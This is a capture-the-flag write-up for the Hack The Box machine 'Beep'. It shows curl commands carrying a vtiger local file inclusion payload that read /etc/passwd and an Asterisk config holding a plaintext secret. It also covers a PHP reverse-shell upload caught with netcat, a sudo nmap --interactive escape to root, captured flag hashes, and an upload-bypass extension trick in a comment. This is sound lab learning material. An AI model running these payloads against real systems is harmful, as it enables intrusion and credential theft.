BEEP
First a scan to get the open ports and services running.
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.10.10.7/ 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING EXPIRE(NEVER) STLS AUTH-RESP-CODE UIDL LOGIN-DELAY(0) APOP USER RESP-CODES TOP 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 743/udp status |_ 100024 1 746/tcp status 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: OK Completed NO SORT NAMESPACE BINARY THREAD=REFERENCES MAILBOX-REFERRALS X-NETSCAPE CATENATE THREAD=ORDEREDSUBJECT LISTEXT LIST-SUBSCRIBED MULTIAPPEND RIGHTS=kxte STARTTLS URLAUTHA0001 RENAME ATOMIC ANNOTATEMORE IDLE UNSELECT IMAP4 CONDSTORE IMAP4rev1 CHILDREN UIDPLUS QUOTA SORT=MODSEQ ID ACL LITERAL+ 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Elastix - Login page | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2017-04-07T08:22:08 |_Not valid after: 2018-04-07T08:22:08 |_ssl-date: 2018-06-21T12:15:07+00:00; -1h20m00s from scanner time. 746/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) 4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap) 4445/tcp open upnotifyp? 4559/tcp open hylafax HylaFAX 4.3.10 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix Host script results: |_clock-skew: mean: -1h20m00s, deviation: 0s, median: -1h20m00s
A lot of open ports. Let’s start with the webserver.
Webserver 10.10.10.7:443
Webserver 10.10.10.7:443/admin
root@n0w4n:~/opt/htb/beep# searchsploit elastix
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
After a quick lookup it looks like Elastix has some issues. Combining that with FreePBX I think I’m going to check out the python script first which should exploit a RCE vulnerability.
The python script needs a little tweaking with the hosts and it give the following description:
# On Elastix, once we have a shell, we can escalate to root: # root@bt:~# nc -lvp 443 # listening on [any] 443 ... # connect to [172.16.254.223] from voip [172.16.254.72] 43415 # id # uid=100(asterisk) gid=101(asterisk) # sudo nmap --interactive
That shouldn’t be to hard.
Traceback (most recent call last):
File "18650.py", line 27, in <module>
urllib.urlopen(url)
File "/usr/lib/python2.7/urllib.py", line 87, in urlopen
return opener.open(url)
File "/usr/lib/python2.7/urllib.py", line 213, in open
return getattr(self, name)(url)
File "/usr/lib/python2.7/urllib.py", line 443, in open_https
h.endheaders(data)
File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
self.send(msg)
File "/usr/lib/python2.7/httplib.py", line 844, in send
self.connect()
File "/usr/lib/python2.7/httplib.py", line 1263, in connect
server_hostname=server_hostname)
File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
_context=self)
File "/usr/lib/python2.7/ssl.py", line 617, in __init__
self.do_handshake()
File "/usr/lib/python2.7/ssl.py", line 846, in do_handshake
self._sslobj.do_handshake()
IOError: [Errno socket error] [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)
It gives back an error. It looks like there are some problems with SSL. Some adjustments to the script:
import ssl ssl._create_default_https_context = ssl._create_unverified_context
After the adjustment the script runs fine, but there is no shell. Time to scan for the known VOIP devices and get more info.
root@n0w4n:~/opt/htb/beep# svmap 10.10.10.7 -vv DEBUG:root:started logging DEBUG:root:parsing range of ports: 5060 DEBUG:DrinkOrSip:external ip was not set INFO:DrinkOrSip:trying to get self ip .. might take a while DEBUG:DrinkOrSip:External ip: 127.0.1.1:5060 DEBUG:DrinkOrSip:Compact mode: False DEBUG:DrinkOrSip:From: sipvicious <sip:100@1.1.1.1> INFO:root:start your engines DEBUG:DrinkOrSip:binding to 0.0.0.0:5060 DEBUG:DrinkOrSip:sending packet to 10.10.10.7:5060 DEBUG:DrinkOrSip:packet: 'OPTIONS sip:100@10.10.10.7 SIP/2.0\r\nVia: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-2103700663;rport\r\nContent-Length: 0\r\nFrom: "sipvicious"<sip:100@1.1.1.1>;tag=3061306130613037313363340132353839373937383931\r\nAccept: application/sdp\r\nUser-Agent: friendly-scanner\r\nTo: "sipvicious"<sip:100@1.1.1.1>\r\nContact: sip:100@127.0.1.1:5060\r\nCSeq: 1 OPTIONS\r\nCall-ID: 851657692881764133361587\r\nMax-Forwards: 70\r\n\r\n' DEBUG:DrinkOrSip:no more hosts to scan DEBUG:DrinkOrSip:Making sure that no packets get lost DEBUG:DrinkOrSip:Come to daddy DEBUG:DrinkOrSip:running fingerPrintPacket() DEBUG:DrinkOrSip:Fingerprint: disabled DEBUG:DrinkOrSip:Uaname: FPBX-2.8.1(1.8.7.0) INFO:DrinkOrSip:10.10.10.7:5060 -> 10.10.10.7:5060 -> FPBX-2.8.1(1.8.7.0) -> disabled INFO:root:we have 1 devices | SIP Device | User Agent | Fingerprint | ------------------------------------------------------- | 10.10.10.7:5060 | FPBX-2.8.1(1.8.7.0) | disabled | INFO:root:Total time: 0:00:03.076845
root@n0w4n:~/opt/htb/beep# svwar -vv 10.10.10.7 DEBUG:root:started logging DEBUG:TakeASip:external ip was not set INFO:TakeASip:trying to get self ip .. might take a while INFO:root:start your engines DEBUG:TakeASip:binding to any:5060 ERROR:TakeASip:socket error: timed out WARNING:root:found nothing INFO:root:Total time: 0:00:03.160302
Looking at the output I could smack myself silly. The scripts try to bind with port 5060, which is the default port for SIP……..and it is closed…..from the beginning!
So it’s back to the initial port scan and check out what’s next.
I decide to get back to the webserver and run a dirsearch scan.
root@n0w4n:~/opt/tools/dirsearch# python3 dirsearch.py -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e php,txt -x 403,404 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php, txt | Threads: 10 | Wordlist size: 141667 Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-27_10-38-22.log Target: https://10.10.10.7 [10:38:22] Starting: [10:38:23] 200 - 2KB - / [10:38:24] 301 - 308B - /help -> https://10.10.10.7/help/ [10:38:25] 301 - 310B - /images -> https://10.10.10.7/images/ [10:38:53] 301 - 314B - /recordings -> https://10.10.10.7/recordings/ [10:39:09] 301 - 309B - /panel -> https://10.10.10.7/panel/ [10:40:07] 301 - 310B - /static -> https://10.10.10.7/static/ [10:40:11] 301 - 310B - /themes -> https://10.10.10.7/themes/ [10:40:31] 301 - 309B - /admin -> https://10.10.10.7/admin/ [10:45:06] 301 - 308B - /mail -> https://10.10.10.7/mail/ [10:45:11] 301 - 311B - /modules -> https://10.10.10.7/modules/ [10:46:13] 301 - 308B - /lang -> https://10.10.10.7/lang/ [10:49:12] 301 - 313B - /vtigercrm -> https://10.10.10.7/vtigercrm/
root@n0w4n:~/opt/htb/beep# searchsploit vtiger crm
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) | exploits/php/webapps/44379.rb
vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions | exploits/php/webapps/2508.txt
vTiger CRM 4.2 - SQL Injection | exploits/php/webapps/26586.txt
vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting | exploits/php/webapps/26584.txt
vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting | exploits/php/webapps/26585.txt
vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32307.txt
vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting | exploits/php/webapps/9450.txt
vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion | exploits/php/webapps/16280.py
vTiger CRM 5.1.0 - Local File Inclusion | exploits/php/webapps/18770.txt
vTiger CRM 5.2 - 'onlyforuser' SQL Injection | exploits/php/webapps/36208.txt
vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/36204.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1) | exploits/php/webapps/36203.txt
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2) | exploits/php/webapps/36255.txt
vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion | exploits/php/webapps/35574.txt
vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting | exploits/php/webapps/35577.txt
vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit) | exploits/php/remote/29319.rb
vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection | exploits/php/webapps/28409.txt
vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit) | exploits/php/remote/30787.rb
vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities | exploits/php/webapps/27279.txt
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion | exploits/php/webapps/32213.txt
vTiger CRM 6.3.0 - Authenticated Remote Code Execution | exploits/php/webapps/38345.txt
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Looks like version 5.1.0 has a LFI vulnerability.
Exploit Title: VTiger CRM # Google Dork: None # Date: 20/03/2012 # Author: Pi3rrot # Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/ # Version: 5.1.0 # Tested on: CentOS 6 # CVE : none We have find this vulnerabilitie in VTiger 5.1.0 In this example, you can see a Local file Inclusion in the file sortfieldsjson.php Try this : https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
That’s easy to test.
root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin spamfilter:x:500:500::/home/spamfilter:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin fanis:x:501:501::/home/fanis:/bin/bash
Lets grab the first flag.
root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00 aeff3def0c765c2677b94715cffa73ac
Because I don’t have the ability to search at my leisure in the file system, I’m going to look for interesting files for the programs I know are installed and to which I have access, like Asterisk (https://www.voip-info.org/asterisk-config-files/).
root@n0w4n:~# curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00 ; ; AMI - Asterisk Manager interface ; ; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need ; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny). ; Also, remember to configure non-default port or IP-addresses in amportal.conf. ; ; The AMI connection is used both by the portal and the operator's panel in FreePBX. ; ; FreePBX assumes an AMI connection to localhost:5038 by default. ; [general] enabled = yes port = 5038 bindaddr = 0.0.0.0 displayconnects=no ;only effects 1.6+ [admin] secret = jEhdIekWmdjE deny=0.0.0.0/0.0.0.0 permit=127.0.0.1/255.255.255.0 read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate #include manager_additional.conf #include manager_custom.conf
After a few tries I get some credentials. With these credentials I have access to the dashboard of Elastix, FreePBX and vtigerCR
With vtigercrm there are a few possibilities to upload files. I go with changing the company logo.
For the uploading of the file I’ll use the php reverse shell script from pentestmonkey. After uploading the file I find the uploaded file in the /test/ folder.
root@n0w4n:~/opt/htb/beep# nc -lnvp 31337 listening on [any] 31337 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.7] 58766 Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 i686 i386 GNU/Linux 12:55:40 up 2 days, 9:44, 0 users, load average: 0.00, 0.06, 0.07 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) sh: no job control in this shell sh-3.2$ id uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
Now for root.
sh-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
There are some flag for nmap that requires root, like -sS, but for a restricted user this is not a normal choice. Also having nmap on root level gives great possibilities.
sh-3.2$ sudo nmap --interactive Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) nmap> waiting to reap child: No child processes (10) !sh id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) cd /root ls anaconda-ks.cfg elastix-pr-2.2-1.i386.rpm install.log install.log.syslog postnochroot root.txt webmin-1.570-1.noarch.rpm cat root.txt /bin/cat: line 1: bash:: command not found /bin/cat: line 2: /etc/passwd:: No such file or directory /bin/cat: line 3: /etc/passwd:: No such file or directory /bin/cat: line 4: /etc/passwd:: No such file or directory /bin/cat: line 5: /etc/passwd:: No such file or directory /bin/cat: line 6: /etc/passwd:: No such file or directory /bin/cat: line 7: /etc/passwd:: No such file or directory /bin/cat: line 8: /etc/passwd:: No such file or directory /bin/cat: line 9: /etc/passwd:: No such file or directory /bin/cat: line 10: /etc/passwd:: No such file or directory /bin/cat: line 11: /etc/passwd:: No such file or directory /bin/cat: line 12: /etc/passwd:: No such file or directory /bin/cat: line 13: /etc/passwd:: No such file or directory /bin/cat: line 14: /etc/passwd:: No such file or directory /bin/cat: line 15: /etc/passwd:: No such file or directory /bin/cat: line 16: /etc/passwd:: No such file or directory /bin/cat: line 17: /etc/passwd:: No such file or directory /bin/cat: line 18: /etc/passwd:: No such file or directory /bin/cat: line 19: /etc/passwd:: No such file or directory /bin/cat: line 20: /etc/passwd:: No such file or directory /bin/cat: line 21: /etc/passwd:: No such file or directory /bin/cat: line 22: /etc/passwd:: No such file or directory /bin/cat: line 23: /etc/passwd:: No such file or directory /bin/cat: line 24: /etc/passwd:: No such file or directory /bin/cat: line 25: /etc/passwd:: No such file or directory /bin/cat: line 26: /etc/passwd:: No such file or directory /bin/cat: line 27: /etc/passwd:: No such file or directory /bin/cat: line 28: /etc/passwd:: No such file or directory /bin/cat: line 29: /etc/passwd:: No such file or directory /bin/cat: line 30: /etc/passwd:: No such file or directory /bin/cat: line 31: /etc/passwd:: No such file or directory /bin/cat: line 32: /etc/passwd:: No such file or directory /bin/cat: line 33: /etc/passwd:: No such file or directory /bin/cat: line 34: /etc/passwd:: No such file or directory /bin/cat: line 35: /etc/passwd:: No such file or directory /bin/cat: line 36: /etc/passwd:: No such file or directory
No /bin/cat? LOL….funny….but no problem.
tac root.txt | tac d88e006123842106982acce0aaf453f0
And it’s done!!!
Hi!
Thanks for this doc, very well done!
I have a question 🙂
Which reverse shell did you upload on vtigercrm? I’m blocked at this point since 2 days 🙁
I uploaded a php reverse shell changing the extension to .php;.jpg in order to pass the sanity for the file. But then I cannot trigger the reverse shell.
Any help?
Thanks
I used the reverse php shell from PentestMonkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell).